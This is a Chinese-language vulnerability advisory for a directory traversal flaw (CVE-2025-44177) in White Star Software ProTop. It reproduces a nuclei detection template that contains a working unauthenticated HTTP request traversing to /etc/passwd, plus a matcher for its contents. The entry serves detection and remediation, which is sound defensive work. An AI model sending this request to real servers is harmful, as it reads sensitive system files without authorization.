White Star Software ProTop 目录遍历漏洞

漏洞信息

漏洞名称： White Star Software ProTop 目录遍历漏洞

漏洞编号：

• CVE： CVE-2025-44177

漏洞类型： 目录遍历

漏洞等级： 高危

漏洞描述： White Star Software ProTop是一款专业的网络监控和管理软件，广泛应用于企业级网络环境中，用于监控网络设备和服务器的状态。该软件提供了一个名为pt3upd的端点，由于未对用户输入进行充分的验证和过滤，导致存在目录遍历漏洞。攻击者可以通过构造特殊的HTTP请求，利用该漏洞未经授权地读取服务器上的任意文件，如/etc/passwd等敏感文件。这种漏洞的利用不需要任何形式的认证，且可以远程执行，极大地增加了攻击的风险。成功利用此漏洞可能导致敏感信息泄露，如系统用户列表，进而可能被用于进一步的攻击，如密码破解或权限提升。建议用户尽快升级到4.4.2-2024-11-27之后的版本以修复此漏洞。

产品厂商： White Star Software

产品名称： ProTop

影响版本： version <= 4.4.2-2024-11-27

来源： https://github.com/projectdiscovery/nuclei-templates/blob/77d3b6970c7b39b844ae1bf2064620786a055145/http%2Fcves%2F2025%2FCVE-2025-44177.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-44177

info:
  name: White Star Software ProTop - Directory Traversal
  author: s-cu-bot
  severity: high
  description: |
    This vulnerability allows unauthenticated directory traversal via the pt3upd endpoint.
    Successful exploitation allows unauthenticated attackers to read arbitrary files on the server,
    such as /etc/passwd, potentially exposing sensitive system information and aiding in further attacks.
  remediation: |
    Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-44177
    - https://client.protop.co.za/
    - https://wss.com/
    - https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-44177
    cwe-id: CWE-22
    cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: white star software
    product: protop
  tags: cve2025,lfi,traversal,protop

http:
  - raw:
      - |
        GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        name: LFI
        regex:
          - "root:.*:0:0:"